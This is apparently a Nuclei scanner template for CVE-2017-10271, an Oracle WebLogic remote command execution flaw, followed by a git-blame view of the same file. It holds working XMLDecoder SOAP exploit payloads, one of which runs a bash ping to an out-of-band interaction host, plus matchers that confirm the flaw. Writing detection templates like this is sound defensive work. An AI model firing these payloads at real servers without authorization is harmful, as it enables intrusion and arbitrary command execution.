nuclei-templates/http/cves/2017/CVE-2017-10271.yaml

id: CVE-2017-10271

info:
  name: Oracle WebLogic Server - Remote Command Execution
  author: dr_set,ImNightmaree,true13
  severity: high
  description: |
    The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
  reference:
    - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
    - https://github.com/SuperHacker-liuan/cve-2017-10271-poc
    - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-10271
    - http://www.securitytracker.com/id/1039608
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2017-10271
    epss-score: 0.97438
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
    epss-percentile: 0.99911
  metadata:
    max-request: 2
    vendor: oracle
    product: weblogic_server
  tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle

http:
  - raw:
      - |
        POST /wls-wsat/CoordinatorPortType HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope
            xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Header>
                <work:WorkContext
                    xmlns:work="http://bea.com/2004/06/soap/workarea/">
                    <java version="1.4.0" class="java.beans.XMLDecoder">
                        <void class="java.lang.ProcessBuilder">
                            <array class="java.lang.String" length="3">
                                <void index="0">
                                    <string>/bin/bash</string>
                                </void>
                                <void index="1">
                                    <string>-c</string>
                                </void>
                                <void index="2">
                                    <string>ping -c 1 {{interactsh-url}}</string>
                                </void>
                            </array>
                            <void method="start"/></void>
                    </java>
                </work:WorkContext>
            </soapenv:Header>
            <soapenv:Body/>
        </soapenv:Envelope>
      - |
        POST /wls-wsat/CoordinatorPortType HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?>
          <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
              <soapenv:Header>
                  <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                      <java>
                          <void class="java.lang.Thread" method="currentThread">
                              <void method="getCurrentWork">
                                  <void method="getResponse">
                                      <void method="getServletOutputStream">
                                          <void method="flush"/>
                                      </void>
                                      <void method="getWriter"><void method="write"><string>{{randstr}}</string></void></void>
                                  </void>
                              </void>
                          </void>
                      </java>
                  </work:WorkContext>
              </soapenv:Header>
              <soapenv:Body/>
        </soapenv:Envelope>

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - regex("<faultstring>java.lang.ProcessBuilder || <faultstring>0", body)
          - contains(interactsh_protocol, "dns")
          - status_code == 500
        condition: and

      - type: dsl
        dsl:
          - body == "{{randstr}}"
          - status_code == 200
        condition: and
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow. 2021-02-03 00:48:46 +00:00			`id: CVE-2017-10271`

			`info:`
Update CVE-2017-10271.yaml (#3468) Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-05-26 15:15:35 +00:00			`name: Oracle WebLogic Server - Remote Command Execution`
Fix false postive CVE-2017-10271 This commit is to increase accuracy by changing the CVE-2017-10271 scan string from "<faultstring>.*" to "<faultstring>java.lang.ProcessBuilder \|\| <faultstring>0". 2022-08-20 05:14:56 +00:00			`author: dr_set,ImNightmaree,true13`
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow. 2021-02-03 00:48:46 +00:00			`severity: high`
Update CVE-2017-10271.yaml (#3468) Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-05-26 15:15:35 +00:00			`description: \|`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.`
Added comments with URLs under the "references" field Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:15:35 +00:00			`reference:`
			`- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271`
			`- https://github.com/SuperHacker-liuan/cve-2017-10271-poc`
Auto Generated CVE annotations [Thu May 26 15:27:05 UTC 2022] :robot: 2022-05-26 15:27:05 +00:00			`- http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-10271`
more updates 2023-07-15 16:29:17 +00:00			`- http://www.securitytracker.com/id/1039608`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
Auto Generated CVE annotations [Thu May 26 15:27:05 UTC 2022] :robot: 2022-05-26 15:27:05 +00:00			`cvss-score: 7.5`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-10271`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.97438`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:::::::*`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-percentile: 0.99911`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: oracle`
			`product: weblogic_server`
			`tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
updated poc 2021-02-04 19:43:23 +00:00			`- raw:`
			`- \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`POST /wls-wsat/CoordinatorPortType HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Language: en`
			`Content-Type: text/xml`
Update CVE-2017-10271.yaml 2021-02-04 19:44:43 +00:00
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`<?xml version="1.0" encoding="utf-8"?>`
payload update to work on both platform 2021-09-12 13:02:24 +00:00			`<soapenv:Envelope`
			`xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`<soapenv:Header>`
payload update to work on both platform 2021-09-12 13:02:24 +00:00			`<work:WorkContext`
			`xmlns:work="http://bea.com/2004/06/soap/workarea/">`
			`<java version="1.4.0" class="java.beans.XMLDecoder">`
			`<void class="java.lang.ProcessBuilder">`
			`<array class="java.lang.String" length="3">`
			`<void index="0">`
			`<string>/bin/bash</string>`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`</void>`
payload update to work on both platform 2021-09-12 13:02:24 +00:00			`<void index="1">`
			`<string>-c</string>`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`</void>`
payload update to work on both platform 2021-09-12 13:02:24 +00:00			`<void index="2">`
Update CVE-2017-10271.yaml 2022-09-22 10:44:21 +00:00			`<string>ping -c 1 {{interactsh-url}}</string>`
payload update to work on both platform 2021-09-12 13:02:24 +00:00			`</void>`
			`</array>`
			`<void method="start"/></void>`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`</java>`
			`</work:WorkContext>`
			`</soapenv:Header>`
			`<soapenv:Body/>`
			`</soapenv:Envelope>`
Update CVE-2017-10271.yaml (#3468) Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-05-26 15:15:35 +00:00			`- \|`
			`POST /wls-wsat/CoordinatorPortType HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Language: en`
			`Content-Type: text/xml`

			`<?xml version="1.0" encoding="utf-8"?>`
			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soapenv:Header>`
			`<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">`
			`<java>`
			`<void class="java.lang.Thread" method="currentThread">`
			`<void method="getCurrentWork">`
			`<void method="getResponse">`
			`<void method="getServletOutputStream">`
			`<void method="flush"/>`
			`</void>`
			`<void method="getWriter"><void method="write"><string>{{randstr}}</string></void></void>`
			`</void>`
			`</void>`
			`</void>`
			`</java>`
			`</work:WorkContext>`
			`</soapenv:Header>`
			`<soapenv:Body/>`
			`</soapenv:Envelope>`

			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Strict matchers for CVE-2017-10271 2022-06-01 22:28:36 +00:00			`matchers-condition: or`
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow. 2021-02-03 00:48:46 +00:00			`matchers:`
Strict matchers for CVE-2017-10271 2022-06-01 22:28:36 +00:00			`- type: dsl`
			`dsl:`
Fix false postive CVE-2017-10271 This commit is to increase accuracy by changing the CVE-2017-10271 scan string from "<faultstring>.*" to "<faultstring>java.lang.ProcessBuilder \|\| <faultstring>0". 2022-08-20 05:14:56 +00:00			`- regex("<faultstring>java.lang.ProcessBuilder \|\| <faultstring>0", body)`
Update CVE-2017-10271.yaml 2022-09-22 10:44:21 +00:00			`- contains(interactsh_protocol, "dns")`
Strict matchers for CVE-2017-10271 2022-06-01 22:28:36 +00:00			`- status_code == 500`
			`condition: and`
additional matcher 2021-11-04 23:18:10 +00:00
Strict matchers for CVE-2017-10271 2022-06-01 22:28:36 +00:00			`- type: dsl`
			`dsl:`
			`- body == "{{randstr}}"`
			`- status_code == 200`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`condition: and`